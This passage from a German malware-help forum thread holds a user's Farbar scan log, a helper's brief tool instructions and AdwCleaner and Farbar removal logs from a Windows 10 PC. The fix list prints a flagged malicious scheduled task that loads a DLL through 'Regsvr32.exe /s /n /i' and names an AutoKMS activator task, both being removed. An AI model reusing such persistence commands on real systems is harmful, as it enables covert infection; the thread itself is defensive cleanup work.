(x86)\Drakonia Configurator\hid.exe 2017-01-22 16:12 - 2012-12-11 12:14 - 00240640 _____ () C:\Program Files (x86)\Drakonia Configurator\trayicon.exe 2017-05-02 20:46 - 2017-05-02 20:46 - 00023840 _____ () 
C:\Program Files\Bitdefender\Bitdefender 2017\lang\de-de\bdsystray.txtui 2017-05-07 17:13 - 2017-05-22 18:29 - 00034448 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\PEbiosinterface32.dll 2017-05-07 17:13 - 2013-07-04 03:32 - 00104448 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\ATKEX.dll 2015-04-25 07:20 - 2014-09-09 10:14 - 00091648 _____ () C:\Program Files (x86)\ASUS\AI Suite III\Log4cxxWrapper.dll 2015-04-25 07:20 - 2014-09-09 10:14 - 00147456 _____ () C:\Program Files (x86)\ASUS\AI Suite III\AssistFunc.dll 2015-04-25 07:20 - 2014-10-11 16:52 - 04346368 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\dip4.dll 2015-04-25 07:20 - 2014-10-11 16:57 - 00091648 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\Log4cxxWrapper.dll 2015-04-25 07:20 - 2014-09-09 10:14 - 00827392 _____ () C:\Program Files (x86)\ASUS\AI Suite III\Version\Version.dll 2015-04-25 07:20 - 2014-10-11 10:57 - 00053248 _____ () C:\Program Files (x86)\ASUS\VGA COM\1.00.20\Exeio.dll 2015-04-25 07:20 - 2014-10-11 10:57 - 00278528 _____ () C:\Program Files (x86)\ASUS\VGA COM\1.00.20\Vender.dll 2015-04-25 07:19 - 2014-09-09 04:14 - 00662016 _____ () C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMLib.dll 2015-04-25 07:20 - 2014-10-11 16:57 - 00711680 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DIPDLL\DIP4DIGIPowerControlAction.dll 2015-04-25 07:20 - 2014-10-11 16:57 - 00856576 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DIPDLL\DIP4EpuAction.dll 2015-04-25 07:20 - 2014-10-11 16:57 - 00803840 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DIPDLL\DIP4FanAction.dll 2015-04-25 07:20 - 2014-10-11 16:57 - 00807936 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DIPDLL\DIP4TurboVEVOAction.dll 2015-02-09 16:47 - 2015-02-09 16:47 - 01932800 _____ () C:\Program Files (x86)\ASUS\GPU Tweak\Vender.dll 2015-03-09 23:12 - 2015-03-09 23:12 - 00057344 _____ () C:\Program Files (x86)\ASUS\GPU Tweak\Exeio.dll 
2015-04-25 07:20 - 2014-10-11 16:57 - 00743424 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\EPU.dll 2015-04-25 07:20 - 2014-10-11 16:57 - 00908288 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\FAN.dll 2015-04-25 07:27 - 2014-09-28 17:59 - 00019872 _____ () C:\Program Files (x86)\Samsung\Samsung Magician\SAMSUNG_SSD.dll 2017-01-22 16:12 - 2013-01-15 18:06 - 00061952 _____ () C:\Program Files (x86)\Drakonia Configurator\HidDevice.dll 2017-01-22 16:12 - 2011-11-22 15:18 - 00249856 _____ () C:\Program Files (x86)\Drakonia Configurator\language.dll 2015-04-25 07:16 - 2013-09-16 12:17 - 01242584 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll ==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) ========= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.) AlternateDataStreams: C:\Users\Dino\Desktop\AdwCleaner_6.046.exe:BDU [0] AlternateDataStreams: C:\Users\Dino\Desktop\tdsskiller.exe:BDU [0] ==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) =================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service" ==================== Verknüpfungen (Nicht auf der Ausnahmeliste) =============== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.) ==================== Internet Explorer Vertrauenswürdig/Eingeschränkt =============== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.) ==================== Hosts Inhalt: =============================== (Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.) 
2013-08-22 15:25 - 2017-05-22 18:30 - 00000824 _____ C:\WINDOWS\system32\Drivers\etc\hosts ==================== Andere Bereiche ============================ (Aktuell gibt es keinen automatisierten Fix für diesen Bereich.) HKU\S-1-5-19-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05222017182914389\Control Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\Windows\img0.jpg HKU\S-1-5-20-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05222017182914405\Control Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\Windows\img0.jpg HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\Control Panel\Desktop\\Wallpaper -> D:\Dino\Bilder\Wallpaper\Bambus.png HKU\S-1-5-21-3554052566-3312977812-1675691648-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05222017182914436\Control Panel\Desktop\\Wallpaper -> D:\Dino\Bilder\Wallpaper\Bambus.png DNS Servers: 8.8.8.8 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) Windows Firewall ist aktiviert. ==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge == ==================== Firewall Regeln (Nicht auf der Ausnahmeliste) =============== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) 
==================== Wiederherstellungspunkte ========================= 19-05-2017 15:50:08 Geplanter Prüfpunkt 21-05-2017 20:53:51 Revo Uninstaller's restore point - Spybot - Search & Destroy ==================== Fehlerhafte Geräte im Gerätemanager ============= ==================== Fehlereinträge in der Ereignisanzeige: ========================= Applikationsfehler: ================== Error: (05/22/2017 06:29:33 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000 Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15 Ausnahmecode: 0xc0000409 Fehleroffset: 0x000eb802 ID des fehlerhaften Prozesses: 0xedc Startzeit der fehlerhaften Anwendung: 0x01d2d3188f15cdb1 Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll Berichtskennung: b1ad504d-774d-47dc-8091-97f294125cee Vollständiger Name des fehlerhaften Pakets: Anwendungs-ID, die relativ zum fehlerhaften Paket ist: Error: (05/22/2017 06:28:32 PM) (Source: SideBySide) (EventID: 33) (User: ) Description: Fehler beim Generieren des Aktivierungskontextes für "c:\program files\amd\cim\bin64\SetACL64.exe". Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden. Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe". Error: (05/22/2017 06:26:47 PM) (Source: SideBySide) (EventID: 33) (User: ) Description: Fehler beim Generieren des Aktivierungskontextes für "c:\program files\amd\cim\bin64\SetACL64.exe". Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden. 
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe". Error: (05/22/2017 06:20:36 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000 Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15 Ausnahmecode: 0xc0000409 Fehleroffset: 0x000eb802 ID des fehlerhaften Prozesses: 0x19e8 Startzeit der fehlerhaften Anwendung: 0x01d2d317569b506b Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll Berichtskennung: 87de692b-dc4c-4e2d-8dc3-b2812352807f Vollständiger Name des fehlerhaften Pakets: Anwendungs-ID, die relativ zum fehlerhaften Paket ist: Error: (05/22/2017 06:14:24 PM) (Source: SideBySide) (EventID: 33) (User: ) Description: Fehler beim Generieren des Aktivierungskontextes für "c:\program files\amd\cim\bin64\SetACL64.exe". Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden. Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe". Error: (05/22/2017 05:52:25 PM) (Source: SideBySide) (EventID: 33) (User: ) Description: Fehler beim Generieren des Aktivierungskontextes für "c:\program files\amd\cim\bin64\SetACL64.exe". Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden. Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe". Error: (05/22/2017 05:52:11 PM) (Source: SideBySide) (EventID: 33) (User: ) Description: Fehler beim Generieren des Aktivierungskontextes für "c:\program files\amd\cim\bin64\SetACL64.exe". 
Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden. Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe". Error: (05/22/2017 05:49:51 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000 Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15 Ausnahmecode: 0xc0000409 Fehleroffset: 0x000eb802 ID des fehlerhaften Prozesses: 0x2a84 Startzeit der fehlerhaften Anwendung: 0x01d2d3130a98ef70 Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll Berichtskennung: ae5b4a4d-a2c5-431d-ab57-77899d5ecaf4 Vollständiger Name des fehlerhaften Pakets: Anwendungs-ID, die relativ zum fehlerhaften Paket ist: Error: (05/21/2017 08:56:28 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000 Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15 Ausnahmecode: 0xc0000409 Fehleroffset: 0x000eb802 ID des fehlerhaften Prozesses: 0x1ba0 Startzeit der fehlerhaften Anwendung: 0x01d2d263f2a109cb Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll Berichtskennung: ae299761-9933-4de1-aba7-7a3113a27840 Vollständiger Name des fehlerhaften Pakets: Anwendungs-ID, die relativ zum fehlerhaften Paket ist: Error: (05/21/2017 08:53:51 PM) (Source: VSS) (EventID: 8194) (User: ) Description: Volumeschattenkopie-Dienstfehler: Beim Abfragen nach der Schnittstelle "IVssWriterCallback" ist ein unerwarteter Fehler aufgetreten. 
hr = 0x80070005, Zugriff verweigert . Die Ursache hierfür ist oft eine falsche Sicherheitseinstellung im Schreib- oder Anfrageprozess. Vorgang: Generatordaten werden gesammelt Kontext: Generatorklassen-ID: {e8132975-6f93-4464-a53e-1050253ae220} Generatorname: System Writer Generatorinstanz-ID: {3c5a8c27-ffbd-4938-9377-2dfe4cb6a471} Systemfehler: ============= Error: (05/22/2017 06:29:18 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT) Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID {6B3B8D23-FA8D-40B9-8DBD-B950333E2C52} und der APPID {4839DDB7-58C2-48F5-8283-E1D1807D0D7D} im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden. Error: (05/22/2017 06:29:18 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT) Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID {6B3B8D23-FA8D-40B9-8DBD-B950333E2C52} und der APPID {4839DDB7-58C2-48F5-8283-E1D1807D0D7D} im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden. Error: (05/22/2017 06:29:12 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Der Dienst "RtNdPt630" wurde aufgrund folgenden Fehlers nicht gestartet: Das System kann die angegebene Datei nicht finden. 
Error: (05/22/2017 06:29:10 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Der Dienst "CldFlt" wurde aufgrund folgenden Fehlers nicht gestartet: Die Anforderung wird nicht unterstützt. Error: (05/22/2017 06:28:43 PM) (Source: DCOM) (EventID: 10005) (User: NT-AUTORITÄT) Description: Fehler "1115" in DCOM, als der Dienst "TrustedInstaller" mit den Argumenten "Nicht verfügbar" gestartet wurde, um den folgenden Server zu verwenden: {752073A1-23F2-4396-85F0-8FDB879ED0ED} Error: (05/22/2017 06:28:43 PM) (Source: DCOM) (EventID: 10005) (User: NT-AUTORITÄT) Description: Fehler "1115" in DCOM, als der Dienst "TrustedInstaller" mit den Argumenten "Nicht verfügbar" gestartet wurde, um den folgenden Server zu verwenden: {752073A1-23F2-4396-85F0-8FDB879ED0ED} Error: (05/22/2017 06:28:43 PM) (Source: DCOM) (EventID: 10005) (User: NT-AUTORITÄT) Description: Fehler "1115" in DCOM, als der Dienst "TrustedInstaller" mit den Argumenten "Nicht verfügbar" gestartet wurde, um den folgenden Server zu verwenden: {752073A1-23F2-4396-85F0-8FDB879ED0ED} Error: (05/22/2017 06:28:43 PM) (Source: DCOM) (EventID: 10005) (User: NT-AUTORITÄT) Description: Fehler "1115" in DCOM, als der Dienst "TrustedInstaller" mit den Argumenten "Nicht verfügbar" gestartet wurde, um den folgenden Server zu verwenden: {752073A1-23F2-4396-85F0-8FDB879ED0ED} Error: (05/22/2017 06:28:43 PM) (Source: DCOM) (EventID: 10005) (User: NT-AUTORITÄT) Description: Fehler "1115" in DCOM, als der Dienst "TrustedInstaller" mit den Argumenten "Nicht verfügbar" gestartet wurde, um den folgenden Server zu verwenden: {752073A1-23F2-4396-85F0-8FDB879ED0ED} Error: (05/22/2017 06:28:43 PM) (Source: DCOM) (EventID: 10005) (User: NT-AUTORITÄT) Description: Fehler "1115" in DCOM, als der Dienst "TrustedInstaller" mit den Argumenten "Nicht verfügbar" gestartet wurde, um den folgenden Server zu verwenden: {752073A1-23F2-4396-85F0-8FDB879ED0ED} CodeIntegrity: =================================== Date: 2017-05-22 
18:29:14.825 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\dbghelp.dll that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2017-05-22 18:21:31.695 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00122_013\avcuf64.dll that did not meet the Microsoft signing level requirements. Date: 2017-05-22 18:21:31.668 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00122_013\avcuf64.dll that did not meet the Microsoft signing level requirements. Date: 2017-05-22 18:20:28.120 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\dbghelp.dll that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2017-05-22 18:19:22.798 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00122_013\avcuf64.dll that did not meet the Microsoft signing level requirements. Date: 2017-05-22 17:49:50.871 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements. 
Date: 2017-05-22 17:49:50.840 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements. Date: 2017-05-21 22:54:24.965 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements. Date: 2017-05-21 20:59:59.585 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements. Date: 2017-05-21 20:59:59.549 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements. 
==================== Speicherinformationen =========================== Prozessor: Intel(R) Core(TM) i7-4790 CPU @ 3.60GHz Prozentuale Nutzung des RAM: 33% Installierter physikalischer RAM: 8127.12 MB Verfügbarer physikalischer RAM: 5380.41 MB Summe virtueller Speicher: 14271.12 MB Verfügbarer virtueller Speicher: 11342.05 MB ==================== Laufwerke ================================ Drive c: () (Fixed) (Total:237.69 GB) (Free:148.33 GB) NTFS Drive d: () (Fixed) (Total:931.51 GB) (Free:620.52 GB) NTFS Drive e: (User Manual) (CDROM) (Total:0.19 GB) (Free:0 GB) CDFS ==================== MBR & Partitionstabelle ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 238.5 GB) (Disk ID: 83B6EBCC) Partition 1: (Active) - (Size=350 MB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=237.7 GB) - (Type=07 NTFS) Partition 3: (Not Active) - (Size=450 MB) - (Type=27) ======================================================== Disk: 1 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: EA468D08) Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS) ==================== Ende von Addition.txt ============================ |
22.05.2017, 20:31 | #14 |
/// TB Trainer | Trojan, adware or something else? Hello, Step 1
Step 2
Step 2 Download the appropriate version of SystemLook from the following mirror and save the tool to your desktop: SystemLook (32 bit) | SystemLook (64 bit)
Step 3
Please post with your next reply
|
23.05.2017, 17:34 | #15 |
| Trojan, adware or something else? Good evening, attached are the requested logs. Code:
ATTFilter # AdwCleaner v6.046 - Bericht erstellt am 23/05/2017 um 18:18:23 # Aktualisiert am 24/04/2017 von Malwarebytes # Datenbank : 2017-05-23.1 [Lokal] # Betriebssystem : Windows 10 Pro (X64) # Benutzername : Dino - **** # Gestartet von : C:\Users\Dino\Desktop\AdwCleaner_6.046.exe # Modus: Löschen # Unterstützung : https://www.malwarebytes.com/support ***** [ Dienste ] ***** ***** [ Ordner ] ***** ***** [ Dateien ] ***** ***** [ DLL ] ***** ***** [ WMI ] ***** ***** [ Verknüpfungen ] ***** ***** [ Aufgabenplanung ] ***** ***** [ Registrierungsdatenbank ] ***** ***** [ Browser ] ***** ************************* :: "Tracing" Schlüssel gelöscht :: Winsock Einstellungen zurückgesetzt :: "Image File Execution Options" Schlüssel gelöscht :: "Prefetch" Dateien gelöscht :: Proxy Einstellungen zurückgesetzt :: Firewall Einstellungen zurückgesetzt :: Internet Explorer Richtlinien gelöscht :: Chrome Richtlinien gelöscht !! Chrome Einstellungen nicht zurückgesetzt: C:\Users\Dino\AppData\Local\Google\Chrome\User Data\Default !! Chrome Einstellungen nicht zurückgesetzt: C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData ************************* C:\AdwCleaner\AdwCleaner[C0].txt - [6849 Bytes] - [22/05/2017 18:19:38] C:\AdwCleaner\AdwCleaner[C2].txt - [1640 Bytes] - [23/05/2017 18:13:04] C:\AdwCleaner\AdwCleaner[C3].txt - [1420 Bytes] - [23/05/2017 18:18:23] C:\AdwCleaner\AdwCleaner[S0].txt - [6473 Bytes] - [22/05/2017 18:18:35] C:\AdwCleaner\AdwCleaner[S1].txt - [1479 Bytes] - [23/05/2017 18:12:22] C:\AdwCleaner\AdwCleaner[S2].txt - [1624 Bytes] - [23/05/2017 18:16:09] C:\AdwCleaner\AdwCleaner[S3].txt - [1697 Bytes] - [23/05/2017 18:18:04] ########## EOF - C:\AdwCleaner\AdwCleaner[C3].txt - [1785 Bytes] ########## Code:
ATTFilter Entferungsergebnis von Farbar Recovery Scan Tool (x64) Version: 22-05-2017 durchgeführt von Dino (23-05-2017 18:23:47) Run:1 Gestartet von C:\Users\Dino\Desktop Geladene Profile: Dino (Verfügbare Profile: Dino) Start-Modus: Normal ============================================== fixlist Inhalt: ***************** CloseProcesses: C:\USERS\DINO\APPDATA\ROAMING\PROFILES CMD: type "C:\Users\Dino\AppData\Roaming\Mozilla\Firefox\profiles.ini" Task: {03FEE5BC-86DA-4B2F-9EEA-E5CB0C1530A9} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Keine Datei <==== ACHTUNG Task: {04670283-EDCA-415F-9886-04F65EE28E14} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Keine Datei <==== ACHTUNG Task: {1B5AB088-48F6-4D90-ADCE-7CEB2DD014B3} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Keine Datei <==== ACHTUNG Task: {30C4F2AB-B9A6-4232-860F-10ADD05E9EA2} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Keine Datei <==== ACHTUNG Task: {4E847E30-5E1C-4E48-8586-201A11017D85} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Keine Datei <==== ACHTUNG Task: {57EE3E64-10C3-4731-B511-79FE0C97A37A} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Keine Datei <==== ACHTUNG Task: {901C65A1-C5C2-4A6E-B3A2-C4E63ABEF28C} - \Optimize Start Menu Cache Files-S-1-5-21-3554052566-3312977812-1675691648-1001 -> Keine Datei <==== ACHTUNG Task: {A839842C-D8D3-410F-A730-39BC24C4484E} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Keine Datei <==== ACHTUNG Task: {AF7B870D-2508-4548-AF95-6776A6BBB9E1} - System32\Tasks\{522333AA-23D9-85D6-489B-224F78B46908} => Regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\646f2bbc\1a8cacde.dll" <==== ACHTUNG Task: {B74C46F5-BB8A-4B7F-BBB5-19E4A68421FA} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe C:\Windows\AutoKMS Task: {C571DD8E-3ED6-476A-BAAE-A345728189FD} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Keine Datei <==== ACHTUNG Task: {CFCB07FE-156D-4218-AA2A-AAFD62CF18D7} - 
\Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Keine Datei <==== ACHTUNG Task: {DE695851-C428-40A8-8661-95C82C81093C} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Keine Datei <==== ACHTUNG Task: {FEF6D7E1-87B1-4C95-BF83-6A6D4A3AF143} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Keine Datei <==== ACHTUNG CMD: dir "%ProgramFiles%" CMD: dir "%ProgramFiles(x86)%" CMD: dir "%ProgramData%" CMD: dir "%Appdata%" CMD: dir "%LocalAppdata%" CMD: dir "%CommonProgramFiles(x86)%" CMD: dir "%CommonProgramW6432%" CMD: dir "%UserProfile%" RemoveProxy: CMD: ipconfig /flushdns CMD: netsh winsock reset EmptyTemp: ***************** Prozesse erfolgreich geschlossen. C:\USERS\DINO\APPDATA\ROAMING\PROFILES => erfolgreich verschoben ========= type "C:\Users\Dino\AppData\Roaming\Mozilla\Firefox\profiles.ini" ========= [General] StartWithLastProfile=1 [Profile0] Name=default-1489247668614 IsRelative=1 Path=Profiles/rcgkbgt3.default-1489247668614 ========= Ende von CMD: ========= HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{03FEE5BC-86DA-4B2F-9EEA-E5CB0C1530A9} => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{03FEE5BC-86DA-4B2F-9EEA-E5CB0C1530A9} => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\launchtrayprocess => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{04670283-EDCA-415F-9886-04F65EE28E14} => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{04670283-EDCA-415F-9886-04F65EE28E14} => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Time-5d => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows 
NT\CurrentVersion\Schedule\TaskCache\Plain\{1B5AB088-48F6-4D90-ADCE-7CEB2DD014B3} => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1B5AB088-48F6-4D90-ADCE-7CEB2DD014B3} => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{30C4F2AB-B9A6-4232-860F-10ADD05E9EA2} => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{30C4F2AB-B9A6-4232-860F-10ADD05E9EA2} => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{4E847E30-5E1C-4E48-8586-201A11017D85} => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4E847E30-5E1C-4E48-8586-201A11017D85} => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{57EE3E64-10C3-4731-B511-79FE0C97A37A} => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{57EE3E64-10C3-4731-B511-79FE0C97A37A} => Schlüssel erfolgreich entfernt 